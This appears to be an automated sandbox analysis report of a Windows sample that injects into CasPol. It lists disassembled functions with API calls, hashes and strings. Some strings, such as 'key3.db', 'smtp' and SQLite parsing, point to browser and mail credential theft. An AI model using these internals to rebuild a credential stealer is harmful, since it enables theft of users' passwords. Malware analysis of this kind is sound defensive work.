                                                                                                                                                                                  • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                                                                                                  • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                                                                                                  Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                  • API String ID: 2221118986-2852464175
                                                                                                                                                                                  • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                  • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                                  • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                  • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                                  Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                  • API String ID: 3510742995-3170954634
                                                                                                                                                                                  • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                  • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                                  • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                                                  Function 0041DB51 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041DBAE
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041DBDB
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041DC47
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                                                                                  • API String ID: 231171946-3708268960
                                                                                                                                                                                  • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                  • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                                                                                                  Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID: winWrite1$winWrite2
                                                                                                                                                                                  • API String ID: 438689982-3457389245
                                                                                                                                                                                  • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                  • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                  • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                  • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                  Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: winRead
                                                                                                                                                                                  • API String ID: 1297977491-2759563040
                                                                                                                                                                                  • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                  • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                  • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                  • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                  Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                  • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: gj
                                                                                                                                                                                  • API String ID: 1297977491-4203073231
                                                                                                                                                                                  • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                  • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                  • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                  Function 0040AB66 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                  • memset.MSVCRT ref: 0040AB9C
                                                                                                                                                                                    • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040ABE1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                  • API String ID: 3337535707-2769808009
                                                                                                                                                                                  • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                  • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                                                                                                  • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                                                                                                  Function 004090B0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4247780290-0
                                                                                                                                                                                  • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                  • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                  Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                                                                                                    • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                                                                                                    • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                                                                                                  • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                                                                                                    • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                    • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                    • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                    • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                  • SetCursor.USER32 ref: 0040B9F9
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040BA0B
                                                                                                                                                                                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2374668499-0
                                                                                                                                                                                  • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                  • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                                                                                  • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                                                                                  Function 0040AD38 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040AD5B
                                                                                                                                                                                  • memset.MSVCRT ref: 0040AD71
                                                                                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                                                                                  • <%s>, xrefs: 0040ADA2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                  • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                  • API String ID: 3699762281-1998499579
                                                                                                                                                                                  • Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                                                                  • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                                                                                                                  • Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                                                                                                                  Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  • Opcode ID: b4bc8ea3596b91dfe4b466af9048751b201f61ada43734c3eff6748fa3cff06f
                                                                                                                                                                                  • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                                                                                  • Opcode Fuzzy Hash: b4bc8ea3596b91dfe4b466af9048751b201f61ada43734c3eff6748fa3cff06f
                                                                                                                                                                                  • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                                                                                  Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                                                                                  • free.MSVCRT ref: 00409B00
                                                                                                                                                                                    • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@$free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2241099983-0
                                                                                                                                                                                  • Opcode ID: 71fd03afa15095c2d0ce6bd683e65a22e38aca543c51e447af1f15dc64016add
                                                                                                                                                                                  • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                                                                                  • Opcode Fuzzy Hash: 71fd03afa15095c2d0ce6bd683e65a22e38aca543c51e447af1f15dc64016add
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                                                                                  Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                    • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                    • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                  • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2775283111-0
                                                                                                                                                                                  • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                  • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                                                  • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                  • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                                                  Function 00405F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                                                                                                                                                    • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                                                                                                                                                    • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                                                                                                                                                    • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                                                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                  • String ID: $
                                                                                                                                                                                  • API String ID: 2498372239-3993045852
                                                                                                                                                                                  • Opcode ID: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                  • Instruction ID: a7623898fd9bb087a7334f25a668ee6c33d9336bc772a6b4061b4b4824447eab
                                                                                                                                                                                  • Opcode Fuzzy Hash: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                  • Instruction Fuzzy Hash: C7317070640259FFEB229B52CC89DAF3E7CEBC5B98F10402DF401792A1CA794F11E669
                                                                                                                                                                                  Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                  • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                  • API String ID: 885266447-2471937615
                                                                                                                                                                                  • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                                                  • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                                                                                                  Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406B11
                                                                                                                                                                                    • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                                                    • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                                                                                                                    • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                  • String ID: Ul@$key3.db
                                                                                                                                                                                  • API String ID: 1968906679-1563549157
                                                                                                                                                                                  • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                  • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                  • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                                                                                  Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                  • String ID: smtp
                                                                                                                                                                                  • API String ID: 2625860049-60245459
                                                                                                                                                                                  • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
